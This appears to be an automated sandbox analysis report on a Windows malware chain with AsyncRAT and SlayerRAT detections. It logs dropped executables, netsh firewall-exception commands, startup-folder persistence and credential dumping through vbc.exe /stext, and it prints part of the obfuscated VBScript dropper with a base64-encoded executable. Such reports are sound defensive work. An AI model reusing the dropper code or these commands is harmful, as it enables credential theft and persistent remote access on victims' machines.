Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source:	Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe	Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep(5000)Dim shadow,devpoint,members,ramadanDim ShaDevset hfhejotgbhzlzyohafchtul = createobject("wscript.shell")ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%TEMP%")Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")Set members=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")shadow.dataType="bin.base64"members.dataType="bin.base64"'--------------------------------shadow.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE4FhmAAAAAAAAAAAOAAAgELAQgAAAgBAAAGAAAAAAAATiYBAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPQlAQBXAAAAAEABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVAYBAAAgAAAACAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAQAEAAAQAAAAKAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGABAAACAAAADgEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwJgEAAAAAAEgAAAACAAUA3LwAABhpAAABAAAAWQAABiS8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACYCKAEAAAoAACoAACoAAigFAAAKAAAqANJzBwAACoABAAAEcwgAAAqAAgAABHMJAAAKgAMAAARzCgAACoAEAAAEcwsAAAqABQAABAAqAAAAEzABABAAAAABAAARAH4BAAAEbwwAAAoKKwAGKhMwAQAQAAAAAgAAEQB+AgAABG8NAAAKCisABioTMAEAEAAAAAMAABEAfgMAAARvDgAACgorAAYqEzABABAAAAAEAAARAH4EAAAEbw8AAAoKKwAGKhMwAQAQAAAABQAAEQB+BQAABG8QAAAKCisABiobMAQAFAEAAAYAABEAAowGAAAbLBIPAP4WBgAAG28VAAAKLQMWKwEXABMEEQQ55gAAAH4GAAAEFP4BFv4BEwURBSwzfgYAAATQBgAAGygWAAAKbxcAAAoTBhEGLBZyAQAAcBaNEwAAASgYAAAKcxkAAAp6ACsLAHMaAAAKgAYAAAQAfgYAAATQBgAAGygWAAAKFG8bAAAKAAAoAQAAKwrefd5ydQ8AAAElLQQmFisWJQwoHQAACghvHgAAChT+ARb+ARb+A/4RJnI7AABwF40TAAABDQkWCG8eAAAKbx8AAAqiAAkoGAAACgsHCG8eAAAKcyAAAAp6KCEAAAreFwB+BgAABNAGAAAbKBYAAApvIgAACgDcACsFAAIKKwEABioBHAAAAQCNAAq7ADeXAAAAAgCNAGXyABcAAAAAEzACAB8AAAAHAAARAAP+FgYAABtvIwAACgADEgD+FQYAABsGgQYAABsAKgAqAAIoJAAACgAAKgATMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBQAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBgAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAIAAAAAwAABEAAowGAAAbFP4BCwcsCigBAAArCisIKwUAAgorAQAGKhMwAgASAAAABwAAEQADEgD+FQYAABsGgQYAABsAKgAAKgACKCQAAAoAACoAEzACACYAAAANAAARAH4rAAAKjAgAABsU/gELBywKKAIAACuAKwAACn4rAAAKCisABioAACoAAigkAAAKAAAqADJzNgAABoAJAAAEACoAAAAmAigkAAAKAAAqAAATMAIAtQMAAA4AABEAcnEAAHAoLQAAChMTFhMSKxQRExESmgoGby4AAAoAERIX1hMSABESEROOt/4EEzYRNi3ecoEAAHAoLQAAChMVFhMUKxYRFREUmhMKEQpvLgAACgARFBfWExQAERQRFY63/gQTNhE2LdxykwAAcCgtAAAKExcWExYrFhEXERaaEwsRC28uAAAKABEWF9YTFgARFhEXjrf+BBM2ETYt3HKnAABwKC0AAAoTGRYTGCsWERkRGJoTDBEMby4AAAoAERgX1hMYABEYERmOt/4EEzYRNi3ccrsAAHAoLQAAChMbFhMaKxYRGxEamhMNEQ1vLgAACgARGhfWExoAERoRG463/gQTNhE2LdxyzQAAcCgtAAAKEx0WExwrFhEdERyaEw4RDm8uAAAKABEcF9YTHAARHBEdjrf+BBM2ETYt3HLhAABwKC0AAAoT

.NET source code contains potential unpacker

Show sources

Source: Tmp.exe.0.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: servieda.exe.1.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

14_2_00403C3D

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_00085021 push cs; ret	2_2_00085022
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E2A66 push 0000003Eh; retn 0000h	12_2_006E2DC0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E4122 push eax; ret	12_2_006E412C
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E2F81 push eax; ret	12_2_006E2F95
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E7196 push cs; iretd	12_2_006E7202
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00910712 push eax; ret	13_2_00910726
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00910712 push eax; ret	13_2_0091074E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008EBA9D push eax; ret	13_2_008EBAB1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008EBA9D push eax; ret	13_2_008EBAD9
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A16B push cs; retf	13_2_0102A183
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A083 push cs; retf	13_2_0102A09B
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102A0F7 push cs; retf	13_2_0102A10F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00411879 push ecx; ret	14_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_004118A0 push eax; ret	14_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_004118A0 push eax; ret	14_2_004118DC

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	File created: C:\Users\user\AppData\Roaming\servieda.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\pgr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_0040F64B

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
